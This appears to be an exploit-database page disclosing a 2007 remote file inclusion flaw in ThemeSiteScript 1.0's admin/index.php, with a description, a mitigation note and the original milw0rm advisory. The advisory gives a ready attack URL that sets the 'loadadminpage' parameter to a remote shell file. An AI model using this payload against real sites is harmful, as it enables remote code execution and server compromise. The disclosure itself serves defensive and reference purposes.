header-logo
Suggest Exploit
vendor:
ThemeSiteScript
by:
Koller
5.5
CVSS
MEDIUM
Remote File Inclusion
CWE
Product Name: ThemeSiteScript
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

ThemeSiteScript 1.0

The vulnerability allows an attacker to include a remote file by manipulating the 'loadadminpage' parameter in the 'index.php' file. This can lead to remote code execution and compromise of the target system.

Mitigation:

The vulnerability can be mitigated by validating and sanitizing user input, specifically the 'loadadminpage' parameter, to prevent arbitrary file inclusion.
Source

Exploit-DB raw data:

#    .__                                          __.   
#    NN)    NNNN   JNNN` NNNN.   NNN NNNNNNNNNNN  NN)   
#    NN)    `NNN).NNNF  .NNNNN  (NN) """4NNN"""`  NN)   
#    NN)     (NNNNNN`   (NNNNN) NNN     (NNN      NN)   
#    NN)      4NNNN`    NNN(NNN.NNF     NNN)      NN)   
#    NN)     JNNNNL    (NN) NNNNNN)    (NNN       NN)   
#    NN)    JNNNNNN)   JNN` `NNNNN     JNNF       NN)   
#    NN)  .NNNF (NNN.  NNN   4NNN)     NNN)       NN)   
#    NN) JNNN`   NNNN (NN)    NNN`    (NNN        NN)   
#    NN)                                          NN)  
#    .__           http://xaker.name              __.
#
#
# script name      : ThemeSiteScript 1.0
# GoogLe Dork      : none
# Of. site         : http://agaresmedia.com
# The price        : $32.99
# Risk             : Medium
# Found By         : Koller
# Thanks           : all members xaker.name & grabberz.com
# Vulnerable files : /admin/index.php

# Vuln : www.victim.com/admin/index.php?loadadminpage=http://localhost/shell.txt?

# Contact: K0ller (at) hotmail (dot) CoM

# milw0rm.com [2007-12-24]